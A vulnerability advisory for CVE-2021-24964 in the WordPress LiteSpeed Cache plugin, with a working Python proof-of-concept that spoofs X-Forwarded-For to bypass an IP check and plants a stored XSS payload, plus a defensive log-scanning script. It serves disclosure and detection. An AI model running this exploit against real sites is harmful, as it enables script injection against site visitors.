LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS. "Load CSS Asynchronously" setting required
| Title | Published | Views | Family |
|---|---|---|---|
| WordPress LiteSpeed Cache plugin cross-site scripting vulnerability | 6 Jan 2022 00:00 | – | cnvd |
| Cross site scripting | 3 Jan 2022 13:15 | – | prion |
| LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS | 30 Nov 2021 00:00 | – | wpvulndb |
| CVE-2021-24964 | 3 Jan 2022 13:15 | – | cve |
| CVE-2021-24964 | 3 Jan 2022 13:15 | – | nvd |
| WordPress LiteSpeed Cache plugin <= 4.4.3 - IP Check Bypass to Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability | 30 Nov 2021 00:00 | – | patchstack |
| CVE-2021-24964 LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS | 3 Jan 2022 12:49 | – | cvelist |
| WordPress LiteSpeed Cache Plugin < 4.4.4 Multiple Vulnerabilities | 24 Jun 2022 00:00 | – | openvas |
The "Load CSS Asynchronously" setting on the Page Optimization page (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work.
```python
#!/bin/python3
import requests
import json


def get_whitelist_ips():
    return requests.get("https://quic.cloud/ips", verify=False).text


print("[+] Getting the whitelisted ips...")
whitelist_ip = get_whitelist_ips().split("<br />")[0]
print(f"[+] Using {whitelist_ip}")
payload = "</style><script>alert(/XSS-cache/);</script>"
site = "https://example.com"


def poison(poison_keys, whitelist_ip):
    for poison_key in poison_keys:
        obj = {
            "status": "done",
            "data": {}
        }
        obj['data'][poison_key] = payload
        res = requests.post(f"{site}/wp-json/litespeed/v1/notify_ccss", data=json.dumps(obj), headers={"X-Forwarded-For": whitelist_ip}, verify=False).json()
        if res['count'] == 1:
            print(f"We have successfully poisoned the {poison_key} key!")
        else:
            print(f"Failed to poison the {poison_key} key")


def get_keys_from_ccss(res):
    obj = json.loads(res)
    return [key for key in obj.keys() if "litespeed_conf.dat" not in obj[key]['url']]


while True:
    res = requests.get(f"{site}/wp-content/litespeed/ccss/.litespeed_conf.dat", verify=False).text
    #print("Waiting for ccss queue file to show up...")
    if '","user_agent":"' in res:
        #print(res)
        poison_keys = get_keys_from_ccss(res)
        poison(poison_keys, whitelist_ip)
```
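For defenders, the two requests this issue depends on (reads of the CCSS queue file and POSTs to `notify_ccss`) can be hunted for in web server access logs. The following is an added example, not part of the original advisory or the plugin's code. It assumes a "combined" log format whose first field is the real TCP peer (behind a reverse proxy this field would be the proxy's address instead), and `ALLOWED` and `SAMPLE` are constructed placeholder values.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumption: "combined" access-log format, where the first field is the TCP
# peer address and not the client-supplied X-Forwarded-For header.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
NOTIFY_ROUTE = "/litespeed/v1/notify_ccss"  # also matches the ?rest_route= form
QUEUE_FILE = "/wp-content/litespeed/ccss/.litespeed_conf.dat"
# Constructed allowlist (documentation range); replace with the published
# QUIC.cloud address list.
ALLOWED = [ipaddress.ip_network("192.0.2.0/28")]


def is_allowed(peer):
    try:
        addr = ipaddress.ip_address(peer)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED)


def scan(lines):
    """Return (peer, reason) for each request worth investigating."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        peer, method, url, status = m.groups()
        decoded = unquote(url)
        if method == "POST" and NOTIFY_ROUTE in decoded and not is_allowed(peer):
            findings.append((peer, "notify_ccss from non-allowlisted peer"))
        elif decoded.split("?", 1)[0].endswith(QUEUE_FILE) and status == "200":
            findings.append((peer, "ccss queue file readable"))
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.5 - - [30/Nov/2021:10:00:00 +0000] "POST /wp-json/litespeed/v1/notify_ccss HTTP/1.1" 200 27 "-" "qc"',
    '203.0.113.9 - - [30/Nov/2021:10:01:00 +0000] "GET /wp-content/litespeed/ccss/.litespeed_conf.dat HTTP/1.1" 200 512 "-" "python-requests/2.26"',
    '203.0.113.9 - - [30/Nov/2021:10:01:01 +0000] "POST /wp-json/litespeed/v1/notify_ccss HTTP/1.1" 200 27 "-" "python-requests/2.26"',
    '203.0.113.9 - - [30/Nov/2021:10:01:02 +0000] "POST /?rest_route=%2Flitespeed%2Fv1%2Fnotify_ccss HTTP/1.1" 200 27 "-" "python-requests/2.26"',
    '198.51.100.7 - - [30/Nov/2021:10:02:00 +0000] "GET /wp-content/litespeed/ccss/.litespeed_conf.dat HTTP/1.1" 403 162 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for peer, reason in scan(SAMPLE):
        print(peer, reason)
```

A hit on the queue file with status 200 also indicates that the `ccss` directory is directly readable, which is worth blocking at the web server regardless of plugin version.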